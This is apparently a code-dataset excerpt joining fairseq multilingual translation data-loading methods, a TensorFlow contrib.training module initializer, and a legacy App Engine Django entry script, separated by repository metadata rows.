dicts = cls.load_all_dictionaries(args, language_list, load_dictionary_and_postproc, training)
return language_list, dicts, training
@classmethod
def load_all_dictionaries(cls, args, language_list, load_dictionary, training):
dicts = OrderedDict()
if args.source_dict is not None:
dicts[SRC_DICT_NAME] = load_dictionary(args.source_dict)
if args.target_dict is not None:
dicts[TGT_DICT_NAME] = load_dictionary(args.target_dict)
if training:
extra_lang_pairs = (
list(
{p for _, v in args.extra_lang_pairs.items() for p in v.split(",")}
)
if args.extra_lang_pairs
else []
)
src_langs_to_load_dicts = sorted(
{p.split("-")[0] for p in (args.lang_pairs + extra_lang_pairs)}
)
tgt_langs_to_load_dicts = sorted(
{p.split("-")[1] for p in (args.lang_pairs + extra_lang_pairs)}
)
else:
src_langs_to_load_dicts = [args.source_lang]
tgt_langs_to_load_dicts = [args.target_lang]
paths = utils.split_paths(args.data)
assert len(paths) > 0
def load_dicts(langs_to_load_dicts):
for lang in langs_to_load_dicts:
dicts[lang] = load_dictionary(
os.path.join(paths[0], "dict.{}.txt".format(lang))
)
if len(dicts) > 0:
dict0 = next(iter(dicts.values()))
assert dicts[lang].pad() == dict0.pad()
assert dicts[lang].eos() == dict0.eos()
assert dicts[lang].unk() == dict0.unk()
logger.info("[{}] dictionary: {} types".format(lang, len(dicts[lang])))
if args.fixed_dictionary is not None:
fixed_dict = load_dictionary(args.fixed_dictionary)
dicts = {lang: fixed_dict for lang in src_langs_to_load_dicts + tgt_langs_to_load_dicts}
else:
if args.source_dict is None:
load_dicts(src_langs_to_load_dicts)
if args.target_dict is None:
load_dicts(tgt_langs_to_load_dicts)
return dicts
def get_source_dictionary(self, lang):
if self.args.source_dict is not None:
return self.dicts[SRC_DICT_NAME]
else:
return self.dicts[lang]
def get_target_dictionary(self, lang):
if self.args.target_dict is not None:
return self.dicts[TGT_DICT_NAME]
else:
return self.dicts[lang]
@classmethod
def create_lang_dictionary(cls, langs):
unk = "<unk>"
# hack to remove symbols other than unk as they are not needed by lang dict
lang_dict = Dictionary(pad=unk, eos=unk, unk=unk, bos=unk)
for lang in langs:
lang_dict.add_symbol(lang)
return lang_dict
@classmethod
def get_langtok_index(cls, lang_tok, dic):
idx = dic.index(lang_tok)
assert (
idx != dic.unk_index
), "cannot find language token {} in the dictionary".format(lang_tok)
return idx
def get_encoder_langtok(self, src_lang, tgt_lang, spec=None):
if spec is None:
return None
if spec and spec.startswith("src"):
if src_lang is None:
return None
langtok = get_lang_tok(
lang=src_lang, lang_tok_style=self.args.lang_tok_style, spec=spec
)
else:
if tgt_lang is None:
return None
langtok = get_lang_tok(
lang=tgt_lang, lang_tok_style=self.args.lang_tok_style, spec=spec
)
return self.get_langtok_index(
langtok, self.get_source_dictionary(src_lang) if src_lang else self.get_target_dictionary(tgt_lang)
)
def get_decoder_langtok(self, tgt_lang, spec=None):
if spec is None:
return None
langtok = get_lang_tok(
lang=tgt_lang, lang_tok_style=self.args.lang_tok_style, spec=spec
)
return self.get_langtok_index(langtok, self.get_target_dictionary(tgt_lang))
@classmethod
def load_data(cls, path, vdict, impl):
dataset = data_utils.load_indexed_dataset(path, vdict, impl)
return dataset
@classmethod
def split_exists(cls, split, src, tgt, lang, data_path, dataset_impl):
filename = os.path.join(data_path, "{}.{}-{}.{}".format(split, src, tgt, lang))
return indexed_dataset.dataset_exists(filename, impl=dataset_impl)
def load_lang_dataset(
self,
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
max_source_positions,
prepend_bos=False,
load_alignments=False,
truncate_source=False,
):
src_datasets = []
tgt_datasets = []
for k in itertools.count():
split_k = split + (str(k) if k > 0 else "")
# infer langcode
if self.split_exists(split_k, src, tgt, src, data_path, dataset_impl):
prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, src, tgt))
elif self.split_exists(split_k, tgt, src, src, data_path, dataset_impl):
prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, tgt, src))
else:
if k > 0:
break
else:
logger.error(
f"Dataset not found: {data_path}, {split_k}, {src}, {tgt}"
)
raise FileNotFoundError(
"Dataset not found: {} ({})".format(split, data_path)
)
src_dataset = self.load_data(prefix + src, src_dict, dataset_impl)
if truncate_source:
src_dataset = AppendTokenDataset(
TruncateDataset(
StripTokenDataset(src_dataset, src_dict.eos()),
max_source_positions - 1,
),
src_dict.eos(),
)
src_datasets.append(src_dataset)
tgt_datasets.append(self.load_data(prefix + tgt, tgt_dict, dataset_impl))
logger.info(
"{} {} {}-{} {} examples".format(
data_path, split_k, src, tgt, len(src_datasets[-1])
)
)
if not combine:
break
assert len(src_datasets) == len(tgt_datasets)
if len(src_datasets) == 1:
src_dataset, tgt_dataset = src_datasets[0], tgt_datasets[0]
else:
sample_ratios = [1] * len(src_datasets)
sample_ratios[0] = upsample_primary
src_dataset = ConcatDataset(src_datasets, sample_ratios)
tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)
if prepend_bos:
assert hasattr(src_dict, "bos_index") and hasattr(tgt_dict, "bos_index")
src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())
tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())
align_dataset = None
if load_alignments:
align_path = os.path.join(
data_path, "{}.align.{}-{}".format(split, src, tgt)
)
if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):
align_dataset = data_utils.load_indexed_dataset(
align_path, None, dataset_impl
)
return src_dataset, tgt_dataset, align_dataset
def load_langpair_dataset(
self,
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
left_pad_source,
left_pad_target,
max_source_positions,
max_target_positions,
prepend_bos=False,
load_alignments=False,
truncate_source=False,
src_dataset_transform_func=lambda dataset: dataset,
tgt_dataset_transform_func=lambda dataset: dataset,
src_lang_id=None,
tgt_lang_id=None,
langpairs_sharing_datasets=None,
src_prefixes=None,
tgt_prefixes=None,
):
norm_direction = "-".join(sorted([src, tgt]))
if langpairs_sharing_datasets is not None:
src_dataset = langpairs_sharing_datasets.get(
(data_path, split, norm_direction, src), "NotInCache"
)
tgt_dataset = langpairs_sharing_datasets.get(
(data_path, split, norm_direction, tgt), "NotInCache"
)
align_dataset = langpairs_sharing_datasets.get(
(data_path, split, norm_direction, src, tgt), "NotInCache"
)
# a hack: any one is not in cache, we need to reload them
if (
langpairs_sharing_datasets is None
or src_dataset == "NotInCache"
or tgt_dataset == "NotInCache"
or align_dataset == "NotInCache"
or split != getattr(self.args, "train_subset", None)
):
# source and target datasets can be reused in reversed directions to save memory
# reversed directions of valid and test data will not share source and target datasets
src_dataset, tgt_dataset, align_dataset = self.load_lang_dataset(
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
max_source_positions=max_source_positions,
prepend_bos=prepend_bos,
load_alignments=load_alignments,
truncate_source=truncate_source,
)
src_dataset = src_dataset_transform_func(src_dataset)
tgt_dataset = tgt_dataset_transform_func(tgt_dataset)
if src_prefixes is not None:
src_dataset = PrefixTokenDataset(src_dataset, src_prefixes)
if tgt_prefixes is not None:
if tgt_dataset is not None:
tgt_dataset = PrefixTokenDataset(tgt_dataset, tgt_prefixes)
if langpairs_sharing_datasets is not None:
langpairs_sharing_datasets[
(data_path, split, norm_direction, src)
] = src_dataset
langpairs_sharing_datasets[
(data_path, split, norm_direction, tgt)
] = tgt_dataset
langpairs_sharing_datasets[
(data_path, split, norm_direction, src, tgt)
] = align_dataset
if align_dataset is None:
# no align data so flag the reverse direction as well in sharing
langpairs_sharing_datasets[
(data_path, split, norm_direction, tgt, src)
] = align_dataset
else:
logger.info(
f"Reusing source and target datasets of [{split}] {tgt}-{src} for reversed direction: "
f"[{split}] {src}-{tgt}: src length={len(src_dataset)}; tgt length={len(tgt_dataset)}"
)
return LanguagePairDataset(
src_dataset,
src_dataset.sizes,
src_dict,
tgt_dataset,
tgt_dataset.sizes if tgt_dataset is not None else None,
tgt_dict,
left_pad_source=left_pad_source,
left_pad_target=left_pad_target,
align_dataset=align_dataset,
src_lang_id=src_lang_id,
tgt_lang_id=tgt_lang_id,
tgt_prefixes=tgt_prefixes
)
def src_dataset_tranform_func(self, src_lang, tgt_lang, dataset, spec=None):
if self.args.lang_tok_replacing_bos_eos:
# it is handled by self.alter_dataset_langtok
# TODO: Unifiy with alter_dataset_langtok
return dataset
if spec is None:
return dataset
tok = self.get_encoder_langtok(src_lang, tgt_lang, spec)
if tok:
return PrependTokenDataset(dataset, tok)
return dataset
def tgt_dataset_tranform_func(self, source_lang, target_lang, dataset, spec=None):
if dataset is None:
# note that target dataset can be None during inference time
return None
if self.args.lang_tok_replacing_bos_eos:
# TODO: Unifiy with alter_dataset_langtok
# It is handled by self.alter_dataset_langtok.
# The complication in self.alter_dataset_langtok
# makes a unified framework difficult.
return dataset
# if not self.args.decoder_langtok:
if not spec:
return dataset
tok = self.get_decoder_langtok(target_lang, spec)
if tok:
return PrependTokenDataset(dataset, tok)
return dataset
def alter_dataset_langtok(
self,
lang_pair_dataset,
src_eos=None,
src_lang=None,
tgt_eos=None,
tgt_lang=None,
src_langtok_spec=None,
tgt_langtok_spec=None,
):
if src_langtok_spec is None and tgt_langtok_spec is None:
return lang_pair_dataset
new_src_eos = None
if (
src_langtok_spec is not None
and src_eos is not None
and (src_lang is not None or tgt_lang is not None)
):
new_src_eos = self.get_encoder_langtok(src_lang, tgt_lang, src_langtok_spec)
else:
src_eos = None
new_tgt_bos = None
if tgt_langtok_spec and tgt_eos is not None and tgt_lang is not None:
new_tgt_bos = self.get_decoder_langtok(tgt_lang, tgt_langtok_spec)
else:
tgt_eos = None
return TransformEosLangPairDataset(
lang_pair_dataset,
src_eos=src_eos,
new_src_eos=new_src_eos,
tgt_bos=tgt_eos,
new_tgt_bos=new_tgt_bos,
)
def load_a_dataset(
self,
split,
data_path,
src,
src_dict,
tgt,
tgt_dict,
combine,
prepend_bos=False,
langpairs_sharing_datasets=None,
data_category=None,
src_prefixes=None,
tgt_prefixes=None,
**extra_kwargs,
):
dataset_impl = self.args.dataset_impl
upsample_primary = self.args.upsample_primary
left_pad_source = self.args.left_pad_source
left_pad_target = self.args.left_pad_target
max_source_positions = self.args.max_source_positions
max_target_positions = self.args.max_target_positions
load_alignments = self.args.load_alignments
truncate_source = self.args.truncate_source
src_dataset_transform_func = self.src_dataset_tranform_func
tgt_dataset_transform_func = self.tgt_dataset_tranform_func
enable_lang_ids = self.args.enable_lang_ids
lang_dictionary = self.lang_dict
src_langtok_spec, tgt_langtok_spec = extra_kwargs["langtok_spec"]
src_langtok = self.get_encoder_langtok(src, tgt, src_langtok_spec)
tgt_langtok = self.get_decoder_langtok(tgt, tgt_langtok_spec)
logger.info(
f"{data_category}:{src}-{tgt} src_langtok: {src_langtok}; tgt_langtok: {tgt_langtok}"
)
langpair_ds = self.load_langpair_dataset(
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
left_pad_source,
left_pad_target,
max_source_positions,
max_target_positions,
prepend_bos,
load_alignments,
truncate_source,
src_dataset_transform_func=lambda dataset: src_dataset_transform_func(
src, tgt, dataset, src_langtok_spec
),
tgt_dataset_transform_func=lambda dataset: tgt_dataset_transform_func(
src, tgt, dataset, tgt_langtok_spec
),
src_lang_id=_lang_id(lang_dictionary, src)
if enable_lang_ids and lang_dictionary is not None
else None,
tgt_lang_id=_lang_id(lang_dictionary, tgt)
if enable_lang_ids and lang_dictionary is not None
else None,
langpairs_sharing_datasets=langpairs_sharing_datasets,
src_prefixes=src_prefixes,
tgt_prefixes=tgt_prefixes,
)
# TODO: handle modified lang toks for mined data and dae data
if self.args.lang_tok_replacing_bos_eos:
ds = self.alter_dataset_langtok(
langpair_ds,
src_eos=self.get_source_dictionary(src).eos() if src else self.get_target_dictionary(tgt).eos(),
src_lang=src,
tgt_eos=self.get_target_dictionary(tgt).eos(),
tgt_lang=tgt,
src_langtok_spec=src_langtok_spec,
tgt_langtok_spec=tgt_langtok_spec,
)
else:
ds = langpair_ds
return ds
def load_split_langpair_datasets(self, split, data_param_list):
datasets = []
langpairs_sharing_datasets = (
{} if self.args.enable_reservsed_directions_shared_datasets else None
)
for param in data_param_list:
ds = self.load_a_dataset(
split=split,
langpairs_sharing_datasets=langpairs_sharing_datasets,
**param,
)
datasets.append(ds)
return datasets
def get_data_paths_and_lang_pairs(self, split):
datapaths = {"main": self.args.data}
lang_pairs = {"main": self.lang_pairs}
if split == getattr(self.args, "train_subset", None):
# only training data can have extra data and extra language pairs
if self.args.extra_data:
extra_datapaths = self.args.extra_data
datapaths.update(extra_datapaths)
if self.args.extra_lang_pairs:
extra_lang_pairs = {
k: v.split(",") for k, v in self.args.extra_lang_pairs.items()
}
lang_pairs.update(extra_lang_pairs)
return datapaths, lang_pairs
@classmethod
def get_dataset_key(cls, data_category, src, tgt):
return f"{data_category}:{src}-{tgt}"
@classmethod
def _get_shard_num_dict(cls, split, paths):
shards = defaultdict(int)
for path in paths:
files = PathManager.ls(path)
directions = set()
for f in files:
if f.startswith(split) and f.endswith(".idx"):
# idx files of the form "{split}.{src}-{tgt}.{lang}.idx"
direction = f.split(".")[-3]
directions.add(direction)
for direction in directions:
shards[direction] += 1
return shards
def get_split_num_data_shards(self, split):
if split in self._num_shards_dict:
return self._num_shards_dict[split]
num_shards_dict = {}
data_paths, lang_pairs = self.get_data_paths_and_lang_pairs(split)
for data_category, paths in data_paths.items():
if data_category not in lang_pairs:
continue
paths = utils.split_paths(paths)
shards_dict = self._get_shard_num_dict(split, paths)
lang_dirs = [
lang_pair.split("-") for lang_pair in lang_pairs[data_category]
]
lang_dirs = [x if len(x) > 1 else (x[0], x[0]) for x in lang_dirs]
for src, tgt in lang_dirs:
key = self.get_dataset_key(data_category, src, tgt)
if "mono_" in data_category:
# monolingual data requires tgt only
assert src is None or src == tgt, (
f"error: src={src}, "
"tgt={tgt} for data_category={data_category}"
)
num_shards_dict[key] = shards_dict[tgt]
else:
if f"{src}-{tgt}" in shards_dict:
num_shards_dict[key] = shards_dict[f"{src}-{tgt}"]
elif f"{tgt}-{src}" in shards_dict:
# follow the fairseq tradition to use reversed direction data if it is not available
num_shards_dict[key] = shards_dict[f"{tgt}-{src}"]
self._num_shards_dict[split] = num_shards_dict
logger.info(f"[{split}] num of shards: {num_shards_dict}")
return num_shards_dict
@classmethod
def get_shard_id(cls, num_shards, epoch, shard_epoch=None):
shard = epoch if shard_epoch is None else shard_epoch
shard = (shard - 1) % num_shards
return shard
def get_split_data_path(self, paths, epoch, shard_epoch, num_shards):
path = paths[self.get_shard_id(num_shards, epoch, shard_epoch)]
return path
def get_split_data_param_list(self, split, epoch, shard_epoch=None):
# TODO: to extend with extra datasets and keys and loop over different shard data paths
param_list = []
data_paths, lang_pairs = self.get_data_paths_and_lang_pairs(split)
logger.info(f"langtoks settings: {self.args.langtoks}")
split_num_shards_dict = self.get_split_num_data_shards(split)
for data_category, paths in data_paths.items():
if data_category not in lang_pairs:
continue
paths = utils.split_paths(paths)
assert len(paths) > 0
if len(paths) > 1:
self._has_sharded_data = True
if split != getattr(self.args, "train_subset", None):
# if not training data set, use the first shard for valid and test
paths = paths[:1]
if data_category in self.args.langtoks:
lang_tok_spec = self.args.langtoks[data_category]
else:
# default to None
lang_tok_spec = (None, None)
# infer langcode
lang_dirs = [
lang_pair.split("-") for lang_pair in lang_pairs[data_category]
]
lang_dirs = [x if len(x) > 1 else (x[0], x[0]) for x in lang_dirs]
for src, tgt in lang_dirs:
assert src is not None or data_category == "mono_dae", (
f"error: src={src}, " "tgt={tgt} for data_category={data_category}"
)
# logger.info(f"preparing param for {data_category}: {src} - {tgt}")
key = self.get_dataset_key(data_category, src, tgt)
data_path = self.get_split_data_path(
paths, epoch, shard_epoch, split_num_shards_dict[key]
)
param_list.append(
{
"key": key,
"data_path": data_path,
"split": split,
"src": src,
"src_dict": self.get_source_dictionary(src)
if src and data_category != "mono_dae"
else None,
"tgt": tgt,
"tgt_dict": self.get_target_dictionary(tgt),
"data_category": data_category,
"langtok_spec": lang_tok_spec,
}
)
return param_list
def get_train_dataset_sizes(
self, data_param_list, datasets, epoch, shard_epoch=None
):
num_shards = [
self.get_split_num_data_shards(param["split"])[param["key"]]
for param in data_param_list
]
data_sizes = []
for (key, d), num_shard in zip(datasets, num_shards):
my_data_sizes = self._training_data_sizes[key]
shard_ind = self.get_shard_id(num_shard, epoch, shard_epoch)
if shard_ind not in my_data_sizes:
my_data_sizes[shard_ind] = len(d)
known_size = max(my_data_sizes.values())
data_sizes.append(
# If we don't know the data size of the shard yet,
# use the the max known data size to approximate.
# Note that we preprocess shards by a designated shard size
# and put any remaining data at the end into the last shard so
# the max shard size approximation is almost correct before loading
# the last shard; after loading the last shard, it will have the
# exact data sizes of the whole data size.
(key, sum(my_data_sizes.get(i, known_size) for i in range(num_shard)))
)
logger.info(
f"estimated total data sizes of all shards used in sampling ratios: {data_sizes}. "
"Note that if the data a shard has not been loaded yet, use the max known data size to approximate"
)
return [s for _, s in data_sizes]
def get_train_sampling_ratios(
self, data_param_list, datasets, epoch=1, shard_epoch=None
):
data_sizes = self.get_train_dataset_sizes(
data_param_list, datasets, epoch, shard_epoch
)
sampling_func = self.sampling_method.sampling_method_selector()
sample_ratios = sampling_func(data_sizes) if sampling_func is not None else None
return sample_ratios
def get_sampling_ratios(self, data_param_list, datasets, epoch, shard_epoch=None):
if self.args.sampling_weights_from_file:
weights = load_sampling_weights(self.args.sampling_weights_from_file)
sample_ratios = [weights[k] for k, _ in datasets]
logger.info(
"| ignoring --sampling-weights when loadding sampling weights "
f"from file {self.args.sampling_weights_from_file}"
)
elif self.args.sampling_weights:
sample_ratios = [self.args.sampling_weights[k] for k, _ in datasets]
else:
sample_ratios = self.get_train_sampling_ratios(
data_param_list, datasets, epoch, shard_epoch
)
if sample_ratios is not None:
logger.info(
"| Upsample ratios: {}".format(
list(zip(map(lambda x: x["key"], data_param_list), sample_ratios))
)
)
assert len(sample_ratios) == len(datasets)
return sample_ratios
def load_split_datasets(
self, split, training, epoch=1, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
data_param_list = self.get_split_data_param_list(
split, epoch, shard_epoch=shard_epoch
)
langpairs_sharing_datasets = (
{} if self.args.enable_reservsed_directions_shared_datasets else None
)
datasets = [
(
param["key"],
self.load_a_dataset(
combine=combine,
langpairs_sharing_datasets=langpairs_sharing_datasets,
src_prefixes=src_prefixes,
tgt_prefixes=tgt_prefixes,
**param,
),
)
for param in data_param_list
]
return datasets, data_param_list
def load_into_concat_dataset(self, split, datasets, data_param_list):
if self.args.lang_tok_replacing_bos_eos:
# TODO: to investigate why TransformEosLangPairDataset doesn't work with ConcatDataset
return SampledMultiDataset(
OrderedDict(datasets),
sampling_ratios=None,
eval_key=None,
collate_format=CollateFormat.single,
virtual_size=None,
split=split,
)
return ConcatDataset([d for _, d in datasets])
def load_sampled_multi_epoch_dataset(
self, split, training, epoch=0, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
datasets, data_param_list = self.load_split_datasets(
split, training, epoch, combine, shard_epoch=shard_epoch,
src_prefixes=src_prefixes, tgt_prefixes=tgt_prefixes, **kwargs
)
if training and split == getattr(self.args, "train_subset", None):
sample_ratios = self.get_sampling_ratios(data_param_list, datasets, epoch)
return SampledMultiEpochDataset(
OrderedDict(datasets),
epoch=epoch,
shard_epoch=shard_epoch,
# valid and test datasets will be degenerate to concating datasets:
sampling_ratios=sample_ratios,
eval_key=None,
collate_format=CollateFormat.single,
virtual_size=self.args.virtual_data_size,
split=split,
virtual_epoch_size=self.args.virtual_epoch_size,
# if not using lang_tok altering, simplified to use the same collater
shared_collater=self._shared_collater(),
)
else:
return self.load_into_concat_dataset(split, datasets, data_param_list)
def load_sampled_multi_dataset(
self, split, training, epoch=0, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
datasets, data_param_list = self.load_split_datasets(
split, training, epoch, combine, shard_epoch=shard_epoch,
src_prefixes=src_prefixes, tgt_prefixes=tgt_prefixes, **kwargs
)
if training and split == getattr(self.args, "train_subset", None):
sample_ratios = self.get_sampling_ratios(data_param_list, datasets, epoch)
return SampledMultiDataset(
OrderedDict(datasets),
epoch=epoch,
# valid and test datasets will be degerate to concating datasets:
sampling_ratios=sample_ratios,
eval_key=None,
collate_format=CollateFormat.single,
virtual_size=self.args.virtual_data_size,
split=split,
# if not using lang_tok altering, simplified to use the same collater
shared_collater=self._shared_collater(),
)
else:
return self.load_into_concat_dataset(split, datasets, data_param_list)
def load_dataset(
self, split, training, epoch=0, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
if self.args.virtual_epoch_size is None:
return self.load_sampled_multi_dataset(
split, training, epoch, combine, shard_epoch,
src_prefixes, tgt_prefixes, **kwargs
)
else:
return self.load_sampled_multi_epoch_dataset(
split, training, epoch, combine, shard_epoch,
src_prefixes, tgt_prefixes, **kwargs
)
| 39.40968
| 124
| 0.578042
|
cc1a6301ec39e8ec211d53d7903565ef8684873e
| 3,454
|
py
|
Python
|
tensorflow/contrib/training/__init__.py
|
shaulr/tensorflow
|
27a98083a6c16f263d668271889863596efbeb84
|
[
"Apache-2.0"
] | 2
|
2020-05-04T03:59:25.000Z
|
2021-07-16T03:09:22.000Z
|
tensorflow/contrib/training/__init__.py
|
amineferchichi/tensorflow
|
4ac9c09d5ca57a03b8daa5fb9e295947b1619854
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/training/__init__.py
|
amineferchichi/tensorflow
|
4ac9c09d5ca57a03b8daa5fb9e295947b1619854
|
[
"Apache-2.0"
] | 1
|
2022-01-22T05:39:49.000Z
|
2022-01-22T05:39:49.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training and input utilities. See @{$python/contrib.training} guide.
@@batch_sequences_with_states
@@NextQueuedSequenceBatch
@@SequenceQueueingStateSaver
@@rejection_sample
@@resample_at_rate
@@stratified_sample
@@weighted_resample
@@bucket
@@bucket_by_sequence_length
@@GreedyLoadBalancingStrategy
@@byte_size_load_fn
@@FailureTolerator
@@rejection_sample
@@stratified_sample
@@resample_at_rate
@@weighted_resample
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.contrib.training.python.training.bucket_ops import *
from tensorflow.contrib.training.python.training.device_setter import *
from tensorflow.contrib.training.python.training.evaluation import checkpoints_iterator
from tensorflow.contrib.training.python.training.evaluation import evaluate_once
from tensorflow.contrib.training.python.training.evaluation import evaluate_repeatedly
from tensorflow.contrib.training.python.training.evaluation import get_or_create_eval_step
from tensorflow.contrib.training.python.training.evaluation import StopAfterNEvalsHook
from tensorflow.contrib.training.python.training.evaluation import SummaryAtEndHook
from tensorflow.contrib.training.python.training.evaluation import wait_for_new_checkpoint
from tensorflow.contrib.training.python.training.failure_tolerator import *
from tensorflow.contrib.training.python.training.feeder import *
from tensorflow.contrib.training.python.training.resample import *
from tensorflow.contrib.training.python.training.sampling_ops import *
from tensorflow.contrib.training.python.training.sequence_queueing_state_saver import *
from tensorflow.contrib.training.python.training.training import add_gradients_summaries
from tensorflow.contrib.training.python.training.training import clip_gradient_norms
from tensorflow.contrib.training.python.training.training import create_train_op
from tensorflow.contrib.training.python.training.training import multiply_gradients
from tensorflow.contrib.training.python.training.training import train
from tensorflow.contrib.training.python.training.tuner import Tuner
# pylint: enable=unused-import,wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
# Allow explicitly imported symbols. Symbols imported with * must also be
# whitelisted here or in the module docstring above.
_allowed_symbols = [
'checkpoints_iterator', 'evaluate_once', 'evaluate_repeatedly',
'get_or_create_eval_step', 'StopAfterNEvalsHook', 'SummaryAtEndHook',
'wait_for_new_checkpoint', 'add_gradients_summaries', 'clip_gradient_norms',
'create_train_op', 'multiply_gradients', 'train']
remove_undocumented(__name__, _allowed_symbols)
| 47.315068
| 90
| 0.819629
|
f118a84e8a92532d986fee0db8524cfe8653b87f
| 1,180
|
py
|
Python
|
legacy_code/main.py
|
rmalik/dspillini
|
1975043075198192396970e62284179d7a6c7098
|
[
"Apache-2.0"
] | 1
|
2016-05-08T18:55:44.000Z
|
2016-05-08T18:55:44.000Z
|
legacy_code/main.py
|
rmalik/dspillini
|
1975043075198192396970e62284179d7a6c7098
|
[
"Apache-2.0"
] | null | null | null |
legacy_code/main.py
|
rmalik/dspillini
|
1975043075198192396970e62284179d7a6c7098
|
[
"Apache-2.0"
] | null | null | null |
import logging, os, sys
# Google App Engine imports.
from google.appengine.ext.webapp import util
# Remove the standard version of Django.
for k in [k for k in sys.modules if k.startswith('django')]:
del sys.modules[k]
# Force sys.path to have our own directory first, in case we want to import
# from it.
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))
# Must set this env var *before* importing any part of Django
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
import django.core.signals
import django.db
import django.dispatch.dispatcher
def log_exception(*args, **kwds):
logging.exception('Exception in request:')
s = django.dispatch.dispatcher.Signal()
# Log errors.
s.connect(
log_exception, django.core.signals.got_request_exception)
# Unregister the rollback event handler.
s.disconnect(
django.db._rollback_on_exception,
django.core.signals.got_request_exception)
def main():
# Create a Django application for WSGI.
application = django.core.handlers.wsgi.WSGIHandler()
# Run the WSGI CGI handler with that application.
util.run_wsgi_app(application)
if __name__ == '__main__':
main()
| 26.818182
| 75
| 0.761017
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.